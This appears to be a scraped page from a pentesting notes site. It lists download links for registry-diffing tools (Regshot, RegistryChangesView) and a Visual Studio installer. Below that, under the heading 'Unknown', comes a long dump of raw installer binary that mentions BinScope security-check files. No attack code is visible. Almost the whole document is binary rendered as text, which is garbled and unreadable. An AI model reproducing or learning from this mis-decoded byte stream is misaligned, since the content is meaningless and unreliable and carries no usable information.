* RegistryChangesView (x86): [registrychangesview-x86.zip](https://amandaguglieri.github.io/hackinglife/files/registrychangesview-x86.zip)
* Regshot 1.9.0: [Regshot-1.9.0.zip](https://amandaguglieri.github.io/hackinglife/files/Regshot-1.9.0.zip)
| [Regshot at HackingLife](https://amandaguglieri.github.io/hackinglife/regshot/)
* Visual Studio Code - Community downloader: [vs\_community\_\_bb594837aa124b4d8487a41015a6017a.exe](https://amandaguglieri.github.io/hackinglife/files/vs_community__bb594837aa124b4d8487a41015a6017a.exe)
Reporting
---------
[https://pentestreports.com/](https://pentestreports.com/)
Last update: 2024-02-02
Created: September 30, 2023 08:14:49
Back to top
---
# Unknown
��ࡱ�>�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������� !"#$%&'()\*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\[\\\]^\_\`abcdefghijklmnopqrstuvwxyz{|}~���������������������������������������������������������������������������������������������������������������������������������������� �������������������� !"#$%&'()\*+,-./01234����67��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������Root Entry����������F�&h}����?0B'Cd8�AdA%�����<SummaryInformation(/����0@H�?�C�A�E�D1H�����@H�A0C�;;B&F7BB4FhD&B���� 0@H�A0C�??(E8B�A(H���� \*@H�A�E�F�A�E(?(E8B�A(H������������\*@H�D3?(A�A+H������������@HC1A5G ����\_C1A5G>@�F�< C�A$H ������C1A5G>@�F�<�:�D�:dD1B5H���� � C1A5G>@�F�<�:�D;,A�D\*H�������������tC1A5G>@�F�<�<�D�;�A/A0H ����8�C1A5G>@�F�<�<�D�@�F�<�:�D�=�F��������U>C1A5G>@�F�<�:�D�?3H����Z>@H�B�A�:�F������������\`@H�D�DrDhD7H&.����a�@H�D�E�D/H���� �@H�D�E�D/;rD'C7CrD������������e�@H�D�E�D�;9B�E$"����m@HF�E2D�A7CrD �����@H C�C�B ��������������@H C5B�ErE?@ABC����EFGHIJKLMNOPQRST����VWXY����\[\\\]^������������bcd����fghijkl����nopqrstuvwxyz{|}~�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������m��=a\]\]7%v�3�U?{���\[X���\[e�2�o�w&�q��T߽N��^�����k�����m�0wM5��s�g��O��v4�c��&�!�a&�q�LKS���jI���֬>�B+��� E�\*�1���e�crOQx��p��~gY�9lF 1�|˄k||���F��d��;��u!X��m�:��G+G� ����祇�������Z-�J�^z��?pi��s�eRk��͔��qjY�jN~ �l� A'w���R@��Q@��:�@��L��:p��(|��~��w�\]���I�p4/��gU�N�J�g�z�\`<5=��y�!��ޭ�ڪ���� ����G��kg�ko�\\�pL�\\�Y��m�N9�3w�\[3��R�O���:ȇ�}�&��Bs���G�:�c���ۣ�W���##ïQ���q'��8�q�8w�"���ezx����gsb}��p6�σ-��T�&�8f�P�M�LÆsƩVM��-��M��o�|z(l���g�ϵK���9'Z��:���N����4s�v(~tyM��\[�\]\_�>�:ڈ�bG����R�+�xo�i4����)��G��:Ͼ��\*\_e���۴������\\�k�\]ڈ��T���\\͒���ԥ2�R�&�γ�6>އ�=��F��\`z��L��|�}э}���2\*��\`�:�\]x�;H�y��Q� ��⧴N�!���\`ߍ��Obv�!'vPQ�M����&�Wf�J���;�������.:�.~ ������fא�+S>3�1��}5��j�2�𰕶��&�����p��\\L#7�m�˞9n3����N�$�>o���^�i�b���<����&�~� �Ę�N�s�?Ĥ� ��m��I����J�� Ls�m<����Z����g�a�� ����p�a�\]���5M�#ڭ�l�YX���M��Z�ż�ddC\]ÏUT~�2J�C,�����<}�S� ��+F摟�y��o��<|�cF\[��+��w�s��Ѕ��)�y�$nX�=l�k���h+X��aI����\`�yi\*�߆�n��\]�(E�B�wS� Kry\]��e�$��1��Ck�P�3� �\`�S�R8)��\_��2F$�ij�}���t�V;�� '4����:�{(�}������� ht¾��UF�eTG|mбE�L$���l��/~ (�9m�=���s��/�F�N�A�l��� �E�~�>Ŀ���n��\*��l����}�.�%=�u�o���>�T�Ęc�����Pɺ�8Za/�+���M��e��U���븋ڤ� |��S}~����ce�������v���ٳ��B\[!��������Dg#x��j��T�����V}������E��q(�i\[ܗ8���\`G?Id��0\[�d��:�ٔz9����&��ž��<�d�����$V���Gk>�\*Pq�Yj��'������0�������R�\_>ύ8�\`$pE1�SA�2S4��c"�:Q�k��@���� K�|�p�3=�Ł-c56@p\`�4O�ܓ<�U\*�\`�,�k\`Uk��b.iks� �'�-�"T�G�B.�džEOq�����Aj�E�~GE���-aRѹ����(xx<;F��၊C�ь��=�S%@Bi�I�Q��4Cf��Ae�LX�NF\*�� �V���\_�Y�H�C$���� �DZ�\`���a�-��x8X���E@6�&���̀�fֶh���"+�r,���@\_�@�"�\*F�\*�\\G!̗����2A밥i"#�LؼΓQ�P?>���;oÄ����$\[@��� ��B��G� �\`��p���Qw�\`��Ѫ�-�θ���b9�;��R\_�� {���7�^fR��fT,3&��A(��b��j۸8\*J�S;1��\]�f#�����ի^q���Uv\[&I���N�\_\`������n 42��N��(n RK�'2������c�>��ocsߕ�\_����OPYAo3� �q��"�a����P�1�-\`��ȉU8֚p�Ca �J������ ��ָ�~:2fߜ�)��K�1�kWP\[0����"Bj�'��&�s���\_M�dV����V�\\�$�H��n�a=��lѪ�m�m�cL�M��R��F�B��:m@�8�C�E ��DS ��l���2=���բ��M��-n �E7��&��\*r� P�h��E~��rz�0�b���%�Ӷ����iTȓmI�c˪\]c r�����\_O�#3,�l��Lh6M �"t��1L�͆�cW�s�NL.o�Ӄ-��\]�f���ҕT�-j?���\\������6�{��W���T"��.^1:+S�Z� ��,MSCF�<,�D�(�F{O AllowedLibs.xml�(�F{O BadHashes.txt'�,G�u Binscope.exe��SG�u BinScopeLib.dll��(G�u CommonChecks.dll��G�u ConfigurationParser.dll$���F�x!CSV\_Report.xslt���G�u DebugInfo.dll���G�u Dia2Lib.dllG����F�x!EULA.rtf"E6�F�x!HTML\_Report.xsltkLXG�u ManagedMD.dll�T� G�u Microsoft.SecurityDevelopmentLifecycle.SdlCommon.dll-\\� G�u msdia120.dll�d�Gc< msdia120.dll.manifest-�G�u symsrv.dll5G�u System.Collections.Immutable.dll�=&!G�u WackChecks.dllB,��Z%�CK�Z{t�y�};�+���+K�^��^yڕ�ؘՋ��0�\`�vW�ƻ;�\]I\`,�4&���&�����P�(��ҔWj�RJZHzz�����9 ��Z�I�Gk�}����kK�TX3ss���^��#�����K�Bp!'�y��c 2�J1�/���Vf��@p��.��t� .�Ms�xn/�g��t1�c\`iF\\:,� ��&��X�r�9�\[/L����vwj��C����|�� ǁ,�&����6���l1\_���u�D� ��\\��zT�.��P3��|E�L��I�|����0+犕�Y�=Q���XC�2�E"Ñs�!�����ZV�ց٢���U��V2�BYG���J�4�q6��l�٬Z��\[�d/��ɏ�B��TL\_0/Cs�|�P\]���\*0W.V�k�m��+ł�(����t9���ayn�kh��媜�4��L�3��\\�3��.gg��ڔ�\]����Ō/֨���ډ�lZ�!\[����z.CG�!��ɫ����5�4ЋٙL��n��ˮ�iO-�+�5S��Ŋ���楜��+�R%=K�-�39���\\+G%�T����3RIN/䴋g�3ȥ�̼�\]�\[ۯ!W�EI�W�e�k����R��ϕ�ؤ��6�z�D\` �gu��"U3������;��YȬu�oK�5Z���\` �K2Ss�bzn��ޞ�\\��@�6���oQ�o��|F\\\\�o۪�����j,d�57;��3@�/Ur�l:����NMgr����LQWl/�Ӻ��|)q���ѳ�(|�|6'ϋ�z�0\`��K�Y�tEYH6\]���rB,����=���Y�g�岾��bUW�-���|%3����\\-��r�M�;�\*�Y�u3ЮB6WHߑ/j7�J��d<0B"T��(K�������Fs%AI�a���x�Ja�!�(J��$���G�t��Rd4��%�H�����QT�'pE�@A��5'�q2~L��4��Vzcd������ݭ�� �b�&S$C�\`�i\`��Ȃ�HE1'�p����X��(�&�$#��/ �@M ��&�1�"�un����)��Ju"��8�6=�9 �$���C�$�\]�D�hÑ �c��q&������G�"�~��V�9�� /���oo|Ѱ��7���\`Y�t1�I�Jb%8��q6�/'���ln��rlRx\\7�q�{���?x�F����4:9� ��+곑�?|m���+\`\]�N�VR\[PW#�F���� ���r�mg}�7���lt��U�p��\[��=����l}-$��%Y��3�����<�zŰ�+���(kh�7~c�㞛�8;�'�������O��y�?{O�y���s�왩w~t�ON>��Ć��7?��WV�|�����}8;s���|8���yo�\_�\]y������\*3o}�����e��u�{��}�O���'�s��?E�}��\_���ؗ�I��u�� �\*ם���G~�³�>nyY�f��0��AT��F �^��$l� �A\_���¬�1�� ��U�9xX�vH���k���2���x���6�!@�q�(.��t\`B\\�~���\*�d,0��N�zCM�E�c��A���c������5\\��2�Jp�$ Dq&��J?�)�N$�k�g��!V�Q��I��5��\[�"�T�Ϳ��mq^�åQ�����Bg�l��chpƸA�&���y �u�OA裦�QX(�ٸ|)���q����/"Al}Cv�GD��>�T�t�@��T��np+@� t\*@� t1�# lP���C��1�B�Q�< �U��T���\*Э=\*У~�+@@ Ы� �N�)@� ��}�qI�Fn1 A�w�G�;D/�Ч?��;e\`#�N��0�O��m�F!�Oۄ�b�����c��@l�a��i�l��x�^=���KyЈby�נ�����+F8Gc�������(z���S��s�g���� !�Q��H��bF��-�㽼c��l6!b�Z��Hv��5�ټ�2��^'��\\27\*�I���:�e����E3��^g��oG\]�S璡ȓ>Zxy�5I��W�"��8g��.ƈ\\����u+H�"�����YÐ��4\*�\]�.�� L�!��b��cmxu){E�y��F\*�^Q�>����G=���t�%�̕O{����K�� ࡣ��N����%� c�1OO@�T�Wѷ�۫B�=�yש�˾ܯ��1,��X ��)0�3{��R���Y��6!��\`��� K,3�а������=��B�&���e�N���%��g�Xl�+�,��}�>���X���~o?��Ì�P,��'�����a���Ks�i��N\[��V����a\_uX�����m4W�6N���EX�e�AA4�;���/���,���y^��@\[fv\[����QJ �t\\��8j�Y^5�ʱ���N���a#��>��8��6;�dLⴣ��7.# ⍁c8\\q�!(?��:�u�3t�^h��� �7va~!�th#O� �V�71Uy���K~,�f��V��'(|C�\*\_�&8ˁ}�x%����5�Y�i\`)^����k��٣�~^��k�x����(/�R ~���A7�� ���M�����k�4fU�0�6��nU4V��\[�S��-�Y�����R ��nSNl��$��|hUʼ�I�"�W�N�7���Q�>�@.^�7���5p�q��&����7�e�y�����CB�����2�Շ-D��^\\��o��\*택#i#W�E��%K:;۸�\]��JL��=�IsX~mc �I���l���Q;��\]H\_��7:#.c�CF'rjiF�R�� d5�HKp�T%�4�D\]��x��r'ê���(�A\`~����6��3\`Q�ת�� �XHG����z5������� �<��&��b����IR9KX~H9\]�\[�?ReP5��3�\*���i�R7i��B\*)W\*��|SK8�<8t��S�R.�\_�y݃�?�)��j�E����RTi�j ���rr��\_ѦV�b�\*=�ƹ�1I.6��H5U����ӏ�5L�zS\\f�\`�x�)�>8(1�j ��}���5(�2���%����w�#��:���������9a�D�� ���JG-o�;��\`�ܾ�� ����d��>��.ff.��Ɂ�KL\[��.sYx^��ڲ�Ȧ��������y����,x�����"��K���1���2A�z�� �HӅ�HuI�8f�3x�4TAd��|a���� $z����W�6�\*=#�Q�H¿ �\[�Aa�\\z��aL�(h�K,٢W�� ����Z�ia�@��6 i5�T�\[�Ҽ0���S�P��c��6��݆�::���PHQ+bU�9�O������.�l�>���P���l����� ���:�\* �R��{\*�%̶�\_��8h�)D�3!�\*<���S~������E�W�j䕔�-9�,��������G�?}�-�j<�-\* u��w��jN=q{q�|�,�e�����OjRE�G}���E�9���ae\[fR�vs�E��"V�w�f'�P�pO��O���@k�<s=�uHV;�Hh�D+��jpA�Z����4������#�rdp�NQ�$, �)�\*EI�z�z��L���}pV�����,6I�Hn8HÓN~���:\_�\*�Lɏ��.җ�Aٗ���\`|�>"���5ei����Z>|p�=\*-���D.��z����ʾ�����8���FZ\*�@���\_�m"D}7�p�Qe�1P��"\\5��Ļ� �&oo�\\�o�t�n�(<d���>!o�������i ��3+��U��i�&Z�.,��Ã�\`.0b�������l�Cp2��s���t�t�X���j����W�\`V�ݍg�\]�2S��AŖ�t�R�ت2�{�w\[��L�rj¡(,D�I����{R�ʀ�f#�(��A��xo�~�},s��W���n�0�^�jn��\*����˄��s�Q�ްl�oz�oi�S�N"/|�Uܒ����=��Nś��< ��8�{�v��g��%���A�Ct��\\ �ix�������B�Jj�Y|�T��k�������C������#l�?u~SCxK�\[����1��M}��Bp��d:�7o�j�\_91��3�CK�}x�ŕ���z�!\[�eI��(�@���pb�P� Q�c�rB�udK��eɑ��Vx��4�����v\[L���ڦ,I�RB�6��\[X� e�-�Җ��^��v�93�C�ݦ�߽��ќ33gΜ�9sf��Ggߍ'��E��{��|6O��S��� <7��1���}����4�,K�U�v<1�� V| M�������=Q1���Z�J�N�G�����"d:�8��8ovL��n�1|R�j2�I��X��0�� 7x�S��F��\\S�z��q5�%�P#�3�M�pE3���xׁ�\[�$qk����\_J����t�7��zȞ|�&�4���8��Ee�s��M���@|\*=��95EGz�5��ZE}1<��y�G��Lf:�QMlǺx�r+��5=��M��QEy(��ɜ���7����a���B�g����NLS��ti���G��ζE��ڳ9�����"�6��/" �?�"����|LO��N��b���ӊʹ�k-����;�%�&�c��PG��c:2��+���H´���\]�R S�3\_��c>�~��Ę�ww�ю�!ltC�C'fœ�1z��|�O�\[�3����ٞ��ek����r=� -���p̚�A{��L�\\!d�C��%�%���\_2Ox���7�ԡ�Ҧ\`��~Dw�'����/$��ޯ�RS�亙�U����$�<<���\`-q$dɉ�O��c���5R.rRD.}��l��� ���̴��&ۗ�\[a?m=��� �^���ы��� t�C�@���"ʖ��L�"�hv��;OY� ��b������I����9o�Z9�ch8�����wמ�V��Vt�����t|�6C�J��"��}��p ����&��Ia������C���)ZVڳN}�,N�a3�#A�뵎����y�E��؉�z���<�?��+<|8���Lz����J��P���l�پ��$��Дn�3���M ��||Y�D�v}荀�P��1B� ��(\*#�/|Uh��<�IÌ�K���ީ��&�.��߯ J $�.?�9�n���2Gr���R�{6<�Fڮ����s.��{r�on@�3I�{^�=��mpV ���ut9�"ᄚ�g ~&��y���c�}q�C��Y�H��ŕi.�ߊ~�|��� ���<�� �ap��J�b���a��Z �\`=a��k=�c��v�j'z��q��� k-�8�P�Q�� �A���p����J-|�I��e���e�/������68�U��N�;^��?�� �g����$ۚJ�t3���V���J���1�F�˕w@\]��\*�lf��\*J�57¯�^����>am�j7�\[���\]n���C)C��m���#L���ߧ��7���j��&M�c�s��g�IK���� U����wM,z��G�'�+��O�.(��UV��ڟzm�U{�ꂝL9Ĕ��>+�9\_��g�����<���'��1�����~�F�O��I?7�Io��Io?c����^j�s�������&�����v�f�9��T��9�+L�C�j�XG�:�H�h\]��{�ܯ�Q�wꨬW9ME=����)v=q����?�����{�ϰ5H��}��1�c�;�����\_bzT6Pʕ DY�@�� ��������4�l��P�˨�|#�����O6^�F(ŀ�;>h±��\_t ��� �p\\�9n���R98��0s�r�-�j�!���R�p-Bާ�7�UU\[�\[��e�.Om�rؠR�J�ڒo ��� ��qx��ML�8��%�����a{ a#�w2|�k~�F>o{�sI�!�rx��+X����t�4N���;Ԝk7��m�:/F��y �m^������Gi���̳��o�ݍ�������t9i�O��^��\]�R~,0��rZ�\_H�A�~��p\\yb���b%�m��^Ƕ�t��נ�qt�����hխJD�l�}�R�$��\*\`� �m�܊����݂��@%�ֱYĂ�0��RaK�+�~�0bk$�.� ������E����|�\*�9��~��W���=�8�U�>�=�\-�M燯J���u���oI�J����juǸ:��Į��Y�\_$v��n�^��qA�w���?huǸ��+�'1�\*%�<�5�Ob�\`\\#�$��-�U+�ލX��ꭇp���+�~��0b�2��z/����~������%��a� � �G�xQ��O3v.\]YO�Ϭ�A�w�����8W�^w���v>����ބUP�D��J�c��}M��+e |Qb)�Ki���0�~}��nøVhi����k�%��أ�e�xv��凎�\`\]'�s�Q6A9cr�{Q�}�ٯ��/$v�Al\`���ĸ��� {���={��7�; -�@iD�7Il}iL��� ��I�R�Zb{K3J'�&�������5ȥ^��1ĺa\`��������#�m������ˠ�"���~e;�$�3�e;|Ib��I����,��;�Y\`-7�K���u�\]Yv�2�-;Pv��K�bѱЍe�)�u��#ew"������s�����u����؏V��͚Π��cw8���D\`���k�ت�O!�Jb�˿���E;(�Q���U�=)�c���u��n�UN���䝾R�8������\_�8�V���~��\*H��+HrA9Z W3�}M9^s�7O���~x��(r������k��{S6 �z)v�w�ۼG0o�{�w3���� �>����\[l�X����y�!�hNb-퇯0���ב��j��Z\[���C\]m9l�%Y35Y{im@��v�j�Q�;�v���;j��ڡ�V�L핵N�&�\[�\_2�\]��}�{!�R�;�!�Q���'mC���m?��ӾC1���e�������U�������r�w�6��渎;a� ��^���a��ڛ86�N������������!��pL��?��rx'<�5�?���U�R~���VIWn�\\�Tj�����a-V�N�����1�.���e}��z��4��{��yL?�s�}�����w�����,�=��cPQ7�{MY\[�iߧaO� ���טO��@��|���!\`�a��v��#�����:,�Ëu�������ߎ��CJ\[���^�n�Qˑ�n�~�G�/��<�~���������3oW���+������1͏�?������\[^�߫�-��ee�g��eK�\\�,������yK&��-7�C�����3�CA������&8�)�?����0'-�� ��4+q�� {���5 w�h�� ,�1v�l�Oɫ�l�^A>�^�<�p�\`I�����\*��ve��i�i�������E�\`�wcM���\_�c�7.�?jq��@����?�za���go�kA�kF�y�$|����1\_�2�F�nh�2(EJu���~Ǯ�c����r؋��և��k���y�0,+9��y�<����ғ�|�FP�?e{�����a�+�%�Ba���Ly��M�@ť�\`F�6�>G&���s�����������O2<�� ��>���4y@���0�p9�&�%��K9��0��'��q8�0��#5s�3<��dS����<��r��'���C�p�C�3��a�}���)^�p�9��0<��E�P��.gx)�}�������s1���>�\`�\\�wY1\\N��VRfk�u��UC�>��y�뽾�����:}k|þC�\_�T�ÿ����- ҁ?�6\`�y�F7e�lߣ�F��t\[���~�����p��G�1�g����0���v?^��}�d8�����c��=�����#9�p�U�C�&�\*\\�<�� 'V3���EUhAN Z��^����cxy(��\*��!�1� �C�9|«p%��%��m���ђ���m����Y���u�6�n���}���k\_ط�w����o���w(\_���P��m��(|��sb��z����^Ye�>��a�k��.���zyK�0�������R֗/�����y\_�.��ķ0�æ0z��D�F��� ..�?k�� �K����y'~\_����N�a��{>��������}�����f�P�Оh4��uD��8��>�j��HOW��@O�%���c�:�љ�&R0O=�K1m��%0IG6�I���\`\*;��$#�SM�?B��AA��L6�)�X�Zg4�pw";��C��#^��'X�H����v�8���$�'N��spPVE�ޖNOU�V�&�gEN��\\03�����u�Ӻ%ɋ�6���e�љr$��d�2b��@>���c\`�T��� CE�t�qGn��\]�T��O����Q,���i�ĥl��ҥƤ� ���j$O1)<&8�1���$vq��f�{��0�ar\\γꋦ��2�1p-��:I�� \]X���p$j�%�'�b������),�wg�t� �en\*:ͩ�œ"6�L ��rYB.3+B3҉˥�5�����b6��� ����ry|���A��C�x��+���&�=V����9��A��^�~:�� \`��c�@>H0a�6���9�ą��Rť�DY9��TɎLL�-(Xа���1!��1OF��Fr)J��GQLJ�v6����%#��-��l��ȹ�/i�қ��tjv\*=���&ұnD��o+h\*��� w� s�s�~0\\��!�>�5Ci�F;R���Op^2�=L�$C�#m;��i���; =ڀ\]���$���e��-�J\[���g�m��0t�\\V��1#�>�ݶ$:�g�Z�p�vb��Kl�mg'�FrL\[\]ь�'�# 'h�y���.�M�\`G�K�m$2�X\`E�\[�I��X��qd��G�����f=��$fb�;�I��r6;@x\*g�-��t\\�P�w�Fw����V6\`�E��?��&<�l֖�b��i9�?#��bn�fE&Tt��%������1:���K����IǴ�S�x1 �Yڗ�����|��6n��,��������3 &,,�B�|F����\]�N�ۇ� �n�P�C�c��=<���Æ��~���?(a����!B�M8�4�4K9�) ��f?�hJ�r���ъ 1!�a�1���:X��ؽGg;���������En�0�b�����A���arr���;�ڛ\*�ϡ�#���q�\[s.p�6+\*�C���Y��\`�}>�M�J��;��� ��F ��a!�݉����Hn֢��V=U!�w��f�E'����\]4�����nh/��fD�5 �\_�H���T�k�\[M檃�u�:H?��k�d����-� (���TrV�,B�.Ş�ƌ�\]��@ُ��D��"m��ٻs1�?\`�c!���0\]��{ 4�z�oM kh�&N�S����ң6����Kĵ�o���oT�\`\]c/�J/=��,=�0�� &IZ�I�+���\[��(�!��ʧF��0�xӼ�9���h�c�lN���\_�~�3���4NiНL��� �7��ú�ͱd�G�'�;�է�E�q�g�X�;=�/=ulj�m�22�ّNQ/-�ԇ;/,�04;��$),�IC�+$�ͦi�uٰ�)���$�����̤��.q�"h��X����k�AW�Q�$�!\]0�ߣ0�T��Cj���� ��1A���'\*��������Ma�~ga���;��C�7���kSL#���"5�9S̙�)�8� WsQ�27�G\\��0f�L��X# JV�;y�U�\_�BNr�jYB���"̏d����W����5�-&d�N,�nQ�cK���X py1e \\-p=�b�Y��>�F.1���o��oK�b�ka-B��%�!= ��0�j �f�2�Zя�A7������q�\*u�0=Xo�o�\]�r����!��0T���J��R�v���!��8R1��C;��s&"�-���\`�Su3R�xR�Eܘ$JaW=J�#��UBSwa�Y��i�w�H�f� �s��C����S�o�ZD�菫M����B��r3�c�h}��@�R�gH=V����s��=!���Ӎr���pZ���,m�x�VX�&�1����6���s���Ma~���ce����U���qR{�E��ڻ�����QI݆F�7!���F�6��įA��5�9f9U�kMͬ�!��X�8�C�;�i�H a��Ń?ˊG��&��q&��NH�%�IVJ^s��a���Q����r����N:�i��S����F�!Y#�O"�8��\\^�9�J���8�s�aZ���=bH�Td����N�~s�F�\_\_�c�V���z�/�#�\*#�\*T$�nj˜il㫘c��o88I,�=����#�cY��$KI�>�5�z��#�m\_}1e+��K�uq+�6tcx��C�gc�Zv�2��!� ��3l)�ӟ�0��n�����hz����a�ͷQ��rse����� �!$0ɝʘ�aG�MS( �3�gy��)rj�/ƥ�rՌ��a��1�hW�6����q.L?ȜE�T7�$A�\]2v9ŒRs�\`�5��?͝�0@).�0��$��fC ���y��N\_A���i4ࡔ�ݵ��L��\[���e�4��3��}r�����B:ŭ�i�5���L��n ~osN�Ԝ4L̅�ô�9�1�H%��1����f���!�O���܉s��8$̳l���,iE��v�x2J�m��4J��\\�ѻ���>7\[����/�cmt��,\[ġ$AR����,g����b�Bل3��E#���\\����dq��\_8��0^��2mZ�p5��)� ����\_r�ɮ�������|��9��܊�09ue=(� �hp������,&ـ ��y�4pN�%�uJ�,I�urt\`�b�vi�rb&�&��q;��s5�:��?W�� q�Op-'#�m��v�� di4�(Z�ݠ��!0�6K7-��?�»�hV\[eL�B�9�f � Q���r���5M �2�ڌKm G�hE��B2�(W�)��&� ٿD�k5I�\*y�Y\\�y��jX�X�$��In�j�D+���b>���MN��!�3�2�B�NŚs���Wpw2�������F)���a�=8��,��qb�Ȱ��q�����,��hr�F���Rҏ�(�i��,O 3���$�y�'\*>��\[�����Ī�|h�����5��X��G��6��O�6W��\[9�?�d�y�%!E�!hp9��4���\*�0�����h�dP)�R�B\]�x�^Eu ���\`�gHQ����\*Y���Y�aզZl .�����\*d� ��˾J0D��<+-6w�jV�J���\\\\�\[HU<����ޢ����^Pr��Xq�lBk�Ӂ�\*������c �\`H�\]%Xm�ˆ0�́�S%����g�g �h�.�U1�:�g~vb��>;9�N���9|��{�m��A�v�u���y�>#g�Q��fq�D�Z��Z����Ʉ���\_�0S��7 ��!�a���H�Z�݊%lDy(W�(�C�:�� }#���L���!-�ߣ�n���!m�b�t�<'�p��0�md���1�p�݆��r� '��r�!�V�cO��ch-�߈ܨ��,�&LOR�X�M,3�\_�9Z��M��(����\`ls&�ky���wK�7�D�uƮ�:Ɛ��\\F�{k��Sn�P+�H;���ӭ�RI�Y�#�/�$���&�I;��H6�c;RF�oKe��I;�\\�)#�W�,����n����Z��6F��\`��垻��c�8���;�-E�F ��HG+��E�<�\[y�����o��\_�?�������t�76=P����\*�M\_>��d����5�3�}����}�muG��r����6�~���^���|�\[^ \[N�|9w(���\]��ʫ���ko�����g���|ʒ~�k���o�����nz�U�������ͣm��;f�\*��D#���TqUU����}F'�"A��K%hL��@�����LL0�k)&r�J欕M�#�\]�EǦ�K�F�a9\\ �09�"q�1�ДxC��H���Կ��Uh(����Y\\�{Vz�x�^�E0/�i�"��\`����ծ���.�ߠ��vk��n{�|��z9(���2������vIZ^�hri1� ���nCΞv�K��L强�4KJ1q)��/)�2�Nœ�ph�� /��+D��=�4� ��m���� ��r��q���%Q��R����\\S�OL���'ߤU�,�� �䷔���SJͻ��(���e�bB��@��Q�j#ЦT��-e!ڥ��T\\U�Ґz�'� �� ���^�"R~�'̛BoqL��S���\`���vT\`���X�������7����\]�?�S�u����|�%���(� ���#�ZiG��c�vtȢ�jE�»\\��\].m�y�w{i�G���Z�;��Hпs�������M�7�.��?࠭!�����������\`�W+BV�����5!�P�����¾��Sg��ͱV�Q)ڦ��r|U���L\\Z��+��h������ ��g�b�9����oO�֭�ԝ�7&�����E�����ΟA��g\\X) �J u\*hwz�'�w�h��� X��V���nqo1){Y��w�1Q\\Q����b��B� �6����L)�Tc�G���X�Z0��bL4�G4��BJ|�H|������E�Xm@(�إ\`�Zc���������b�&��ݝ��sϽ��}���|�����(4:�(\\wkpP���̥�n�nM��\\�&y�Wb�d���ZV��>��-R,�h8�&L�{�L�X� Ƣ�C?o��A.2oJ0E�X̣ ��2��gz������|��2�e�e,F��N�\`"V�6Z��l�$ ^�b�p �ji𬵙' 0��0\[�LWfX�2Z-�8�=fr�\`5j��צ�Q�%�W�'�D�$!��t-KKKGM�y �I�3����h�)�$+��bM�8� dz��Q��(���1��O�D釚��˒�C���Hb2賍�\*hd��\\����W0l�oM��1w�\[Y4M��4Nv��$���yڦ����c��\`NBf��Ʃ���;V�m���Ȩ��QhE\`X�)��&�6N�휝q�6U�ݨC�5�5�^J� \]X4�X�%^h�rC'�$xP�6�~��������acu���F��t�\*��H" �8���Rq�'�\\1;?4lP���Z^\`,0�)�\`�-��\\H��H��ׂ�T�Sr�M%�I��:?�y 0F�s�P7sJ��j�?�Ӛٸ�3�2 ^x���\_���t��{�RƘ����/�"SQ�HSc ��j%��.R�i�,^9c-��tO|;�=�\]˽ehh���뽽�������;}��v�K-�w��}�����\\<��(({��}���41\*���� |P��X�~\_����W0����e��΅m�v�8�j5t-Ø=z�wn�\]�{"���H>)�������A3�͛7�t��� 0\`o+����!�z���6��� N��$�C�1G�//O��)'�������\_i!�!���;:r�vl�o�e���(�4�5����K\\�a�CppjQۦ����\[���9����ϝ4��z\*�BET�GW�?u���֡z����:���.�9n�/����yABӇ��jlCʉ���M�4��U��EAyHi\]������ZJ��fǍ���Y\*�\[�P6mQ͊���t��G��\[��� b��"�N�U\]��s�γ���F��W�w6�������c��f ���iMB�9A�V�� ��rC9�:��5kZg���h^��������յ��������555�t���V�t�vvv���vuu�E��)���g#%� o�ϸ�;�fN�ͩs�&U�B^�A��������h���Z���H&��̘#��N(�S8�-7�FF���k�nN\_{m9�J�\]P�T��v��i���pVb���j)�X>r�و%7����p��%mS���,��9�m�����+#\`{7!���\_���˕�������9�$���z��E�ڋ��)X}+u{��;�3�N�dlB�(<~��/�Թ!;Ր$������Vd����k�����z3g��Բ+I���\\N(������x�?S�~����܆�J�-�S�jl8�M=�Yu"�Y�睧�}j��f���5��l=�f{�����Nʯ/C��{7��<:�����ۙ@�@���=��q&x�ޅ�:�wv^������Գ�G|=��}c��2�Y\[��=����s\*���(���#/�\_M��!��!uY��l\`����W�k?��y������ý5�ˑML�e�Ր�ˏ��������p�˽���Oh��ў��p��s�n����p|�������e+w���b@����-:���N�ȶ����P.��Ʌ�urt�8:�8|�h!E�\`�C�C4��w�O�p�5z'��k�����GGFq\\��(����xN�n�\_�w�5zG>/��\*t�89D�q��H�������w�;\\�ގ�� 